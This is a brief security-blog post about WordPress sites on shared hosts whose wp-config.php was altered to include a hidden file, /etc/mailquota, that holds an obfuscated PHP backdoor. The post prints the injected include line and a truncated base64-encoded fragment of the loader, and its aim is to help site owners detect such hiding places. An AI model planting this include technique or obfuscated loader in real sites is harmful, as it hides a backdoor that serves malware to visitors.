Malware on /etc/mailquota

We are seeing an interesting trend lately. A site gets compromised and starts to distribute malware to its users. The webmaster (owner of the site) searches everywhere for malicious strings, and can’t find anything. Where can it be hidden?

It could be outside the root directory of your site. On many sites we’ve been analyzing over the last few days, they’ve been adding the following code in wp-config.php (yes, WordPress sites on shared hosts):

require( ABSPATH . “/../etc/mailquota”);

Interesting right? It is including mailquota which is not a PHP file. When you look at the file, you get a long string of encoded PHP:

ncftp /etc > cat mailquota
<?$GLOBALS['_1562346450_']=Array(base64_decode(‘ZX’ .’Jy’ .’b3J’ .’fc’ .’mVwb3J0aW5′ .’n’),base64_decode(‘cHJlZ19t’ .’YXRj’ .’aA’ .’==’),base64_decode(‘cHJlZ19t’ .’YXRja’ .’A==’),base64_decode(‘c’ .’HJlZ19tYX’ .’Rja’ .’A==’),base64_decode(‘Z2V0aG9z’ .’dGJ5YWRk’ .’cg==’)); ..{$a=Array(‘QF45N1wuMTA3XC4xMzV8MTczXC4yMzBcLjEyOHw2NlwuMjI4XC4zNEA=’,

After being decoded, this does a bunch of nasty things (include a JavaScript malware, acts as a backdoor, etc).

The lesson here? Never limit yourself to your web site root directory when searching for malicious strings. They can be anywhere (even hidden as Apache modules).

Web site hacked? You think it is? Scan it here to double check: http://sitecheck.sucuri.net.
Need help cleaning up a site?

Scan your website for free:
About David Dede

Sucuri Security bot (crazy work) - Malware research updates, sucuri news and more.